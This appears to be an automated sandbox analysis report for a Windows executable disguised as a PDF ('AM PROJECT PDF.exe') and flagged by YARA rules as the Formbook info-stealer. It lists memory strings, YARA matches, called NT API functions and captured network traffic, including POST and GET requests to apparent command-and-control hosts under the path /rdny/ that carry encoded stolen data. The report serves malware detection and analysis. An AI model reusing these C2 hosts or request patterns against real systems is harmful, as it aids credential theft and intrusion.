Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: 262I-Au.18.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 262I-Au.18.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 262I-Au.18.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 262I-Au.18.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://use.fontawesome.com/releases/v5.3.1/css/all.css
Source: svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected:
POST /rdny/ HTTP/1.1
Host: www.soraligne.com
Connection: close
Content-Length: 409
Cache-Control: no-cache
Origin: http://www.soraligne.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.soraligne.com/rdny/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Data Raw: 41 30 47 3d 71 67 44 78 72 34 56 56 65 46 62 6a 4e 58 74 58 76 47 59 6d 58 4f 4c 4b 34 50 70 68 70 54 65 41 71 56 4b 46 4b 56 44 78 55 64 5a 77 41 6d 7e 7a 68 57 57 71 77 37 79 4d 52 4c 65 76 62 74 53 66 38 4a 37 46 7a 36 46 5f 38 31 51 38 55 4b 64 42 39 32 73 52 54 6f 31 74 61 59 6d 36 36 65 37 56 77 41 6b 55 58 75 32 6c 76 41 69 53 51 6f 6b 4c 50 42 35 55 5a 67 6e 6c 35 34 70 37 58 36 51 58 4d 63 35 6f 51 33 65 4e 39 45 4e 4f 71 38 69 65 49 44 46 30 6a 35 32 31 4c 63 52 64 6a 38 77 6a 56 56 51 37 30 56 53 76 66 4f 59 5f 4d 65 55 34 31 34 65 42 7e 4e 68 77 6b 42 68 73 46 77 7e 38 4d 36 6d 42 61 61 6b 51 4c 47 33 57 55 68 65 4b 69 4c 70 77 42 4c 78 4d 49 6a 44 6d 79 46 4f 30 79 31 38 47 74 32 58 4a 77 31 66 67 4c 6b 6e 74 61 4c 67 41 41 4c 68 44 63 59 74 4f 61 61 65 57 51 6c 45 71 6a 61 31 53 79 31 52 31 74 6b 54 51 36 53 4c 61 58 71 53 38 38 65 4b 31 73 6b 71 6d 7e 59 4f 4d 74 42 56 66 33 47 47 47 4f 6f 38 57 59 6b 70 61 28 6a 59 72 39 57 4f 79 38 44 39 34 79 48 76 6c 50 58 39 66 34 51 37 75 48 5a 6e 59 65 4a 71 5f 78 6f 59 6e 74 6d 6c 52 35 48 79 61 36 77 46 36 76 79 75 58 34 6c 35 51 48 54 4d 65 30 44 6e 72 57 5f 54 47 6e 30 79 38 44 31 5a 6c 39 76 69 4d 69 43 49 6e 39 55 33 4c 4e 73 54 7a 6d 51 29 2e 00 00 00 00 00 00 00 00
Data Ascii: A0G=qgDxr4VVeFbjNXtXvGYmXOLK4PphpTeAqVKFKVDxUdZwAm~zhWWqw7yMRLevbtSf8J7Fz6F_81Q8UKdB92sRTo1taYm66e7VwAkUXu2lvAiSQokLPB5UZgnl54p7X6QXMc5oQ3eN9ENOq8ieIDF0j521LcRdj8wjVVQ70VSvfOY_MeU414eB~NhwkBhsFw~8M6mBaakQLG3WUheKiLpwBLxMIjDmyFO0y18Gt2XJw1fgLkntaLgAALhDcYtOaaeWQlEqja1Sy1R1tkTQ6SLaXqS88eK1skqm~YOMtBVf3GGGOo8WYkpa(jYr9WOy8D94yHvlPX9f4Q7uHZnYeJq_xoYntmlR5Hya6wF6vyuX4l5QHTMe0DnrW_TGn0y8D1Zl9viMiCIn9U3LNsTzmQ).
Source: unknown DNS traffic detected: queries for: www.fellyhub.com
Source: global traffic HTTP traffic detected:
GET /rdny/?7n-=6lYX&A0G=dZ8Ayr2drPdNVPVmuvzgGnZ5EDtn0CBwsWjIF75G8uy0K/UwgFE8TCCkfo+4feZhoJ7iWr04K24a/vrIrcJXcRwwE/YP1kXGBw== HTTP/1.1
Host: www.fellyhub.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Source: global traffic HTTP traffic detected:
GET /rdny/?A0G=nirRoMghSnbgIhB91EMNSfP7/7ht0QeVg0GeLwyPWvopBgzqt2G+p533L6eaW6GeyJy3z9ND4nEybKooy0llY69rAo//5MT1xA==&7n-=6lYX HTTP/1.1
Host: www.soraligne.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Source: AM PROJECT PDF.exe, 00000000.00000002.299387212.00000000007DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Source: Yara match File source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.425240569.0000000001050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: AM PROJECT PDF.exe PID: 2104, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 1092, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: AM PROJECT PDF.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.425240569.0000000001050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: AM PROJECT PDF.exe PID: 2104, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 1092, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 0_2_06C62F48 0_2_06C62F48
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 0_2_0242E9E8 0_2_0242E9E8
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 0_2_0242BF84 0_2_0242BF84
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 0_2_06DA783C 0_2_06DA783C
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116F900 6_2_0116F900
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01184120 6_2_01184120
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011899BF 6_2_011899BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0123E824 6_2_0123E824
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221002 6_2_01221002
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118A830 6_2_0118A830
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117B090 6_2_0117B090
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_012320A8 6_2_012320A8
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011920A0 6_2_011920A0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_012328EC 6_2_012328EC
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01232B28 6_2_01232B28
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118AB40 6_2_0118AB40
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119EBB0 6_2_0119EBB0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122DBD2 6_2_0122DBD2
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_012203DA 6_2_012203DA
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0121FA2B 6_2_0121FA2B
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_012322AE 6_2_012322AE
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01232D07 6_2_01232D07
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01160D20 6_2_01160D20
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01231D55 6_2_01231D55
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01192581 6_2_01192581
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117D5E0 6_2_0117D5E0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_012325DD 6_2_012325DD
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117841F 6_2_0117841F
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122D466 6_2_0122D466
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01231FF1 6_2_01231FF1
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0123DFCE 6_2_0123DFCE
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01186E30 6_2_01186E30
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122D616 6_2_0122D616
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01232EF7 6_2_01232EF7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_004012A3 6_2_004012A3
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_00422844 6_2_00422844
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_004044C7 6_2_004044C7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0040B4F7 6_2_0040B4F7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0040FED7 6_2_0040FED7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_004046E7 6_2_004046E7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: String function: 0116B150 appears 66 times
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_011A9910
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A99A0 NtCreateSection,LdrInitializeThunk, 6_2_011A99A0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9840 NtDelayExecution,LdrInitializeThunk, 6_2_011A9840
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9860 NtQuerySystemInformation,LdrInitializeThunk, 6_2_011A9860
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A98F0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_011A98F0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9A00 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_011A9A00
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9A20 NtResumeThread,LdrInitializeThunk, 6_2_011A9A20
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9A50 NtCreateFile,LdrInitializeThunk, 6_2_011A9A50
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9540 NtReadFile,LdrInitializeThunk, 6_2_011A9540
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A95D0 NtClose,LdrInitializeThunk, 6_2_011A95D0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9710 NtQueryInformationToken,LdrInitializeThunk, 6_2_011A9710
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9780 NtMapViewOfSection,LdrInitializeThunk, 6_2_011A9780
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A97A0 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_011A97A0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9FE0 NtCreateMutant,LdrInitializeThunk, 6_2_011A9FE0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9660 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_011A9660
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A96E0 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_011A96E0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9950 NtQueueApcThread, 6_2_011A9950
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A99D0 NtCreateProcessEx, 6_2_011A99D0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9820 NtEnumerateKey, 6_2_011A9820
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011AB040 NtSuspendThread, 6_2_011AB040
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A98A0 NtWriteVirtualMemory, 6_2_011A98A0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9B00 NtSetValueKey, 6_2_011A9B00
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011AA3B0 NtGetContextThread, 6_2_011AA3B0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9A10 NtQuerySection, 6_2_011A9A10
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9A80 NtOpenDirectoryObject, 6_2_011A9A80
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011AAD30 NtSetContextThread, 6_2_011AAD30
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9520 NtWaitForSingleObject, 6_2_011A9520
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9560 NtWriteFile, 6_2_011A9560
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A95F0 NtQueryInformationFile, 6_2_011A95F0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011AA710 NtOpenProcessToken, 6_2_011AA710
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9730 NtQueryVirtualMemory, 6_2_011A9730
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011AA770 NtOpenThread, 6_2_011AA770
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9770 NtSetInformationFile, 6_2_011A9770
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9760 NtOpenProcess, 6_2_011A9760
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9610 NtEnumerateValueKey, 6_2_011A9610
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9650 NtQueryValueKey, 6_2_011A9650
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9670 NtQueryInformationProcess, 6_2_011A9670
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A96D0 NtCreateKey, 6_2_011A96D0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0041E027 NtClose, 6_2_0041E027
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0041E0D7 NtAllocateVirtualMemory, 6_2_0041E0D7
